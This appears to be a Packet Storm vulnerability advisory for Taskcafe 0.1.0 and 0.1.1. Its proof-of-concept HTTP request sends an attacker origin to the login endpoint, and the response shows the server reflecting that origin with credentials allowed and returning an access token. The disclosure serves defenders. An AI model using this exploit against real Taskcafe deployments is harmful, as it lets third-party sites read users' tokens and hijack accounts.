what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Taskcafe 0.1.0 / 0.1.1 Cross Origin Resource Sharing

Taskcafe 0.1.0 / 0.1.1 Cross Origin Resource Sharing
Posted Nov 16, 2020
Authored by Mufaddal Masalawala

Taskcafe version 0.1.0 and 0.1.1 suffer from a cross-origin resource sharing vulnerability.

tags | exploit
SHA-256 | e87e6d029332366150987a9e5e8ddf9a85db6b302526c9d23cfd3f9d1e9d031d

Taskcafe 0.1.0 / 0.1.1 Cross Origin Resource Sharing

Change Mirror Download
#Exploit Title: Taskcafé 0.1.0 and 0.1.1- Cross-Origin Resource Sharing
#Date: 2020- 09- 02
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://github.com/JordanKnott/
#Software Link: https://github.com/JordanKnott/taskcafe
#Version: 0.1.0 and 0.1.1
#Tested on: Kali Linux 2020.3
#POC:
The web application fails to properly validate the Origin header
and returns the header Access-Control-Allow-Credentials: true. In this
configuration any website can issue requests made with user credentials and
read the responses to these requests. Trusting arbitrary origins
effectively disables the same-origin policy, allowing two-way interaction
by third-party web sites.
#REQUEST:
POST /auth/login HTTP/1.1
Host: 10.20.175.152:3333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.20.175.152:3333/login
Content-Type: text/plain;charset=UTF-8
Origin: http://attacker-website.com
Content-Length: 43
Connection: close
Cookie: refreshToken=c00f94f3-c151-4e13-8084-ea160d94e584
{"username":"XXXX","password":"XXXXXX"}
#RESPONSE:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://attacker-website.com
Access-Control-Expose-Headers: Link
Content-Type: application/json
Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu,
03 Sep 2020 04:22:10 GMT; HttpOnly
Vary: Origin
Date: Wed, 02 Sep 2020 04:22:10 GMT
Content-Length: 271
Connection: close
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI4YmRhMmY5ZS1iM2E3LTRmNzgtOTQ2Ny05YWZmNGM0OGFkZTAiLCJyZXN0cmljdGVkIjoidW5yZXN0cmljdGVkIiwib3JnUm9sZSI6Im1lbWJlciIsImV4cCI6MTU5OTAyMDUzNX0.eDYvNvXRf6CKULCOrMLAtKnUek9Y8IP9YnVXRAR74gE","isInstalled":false}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close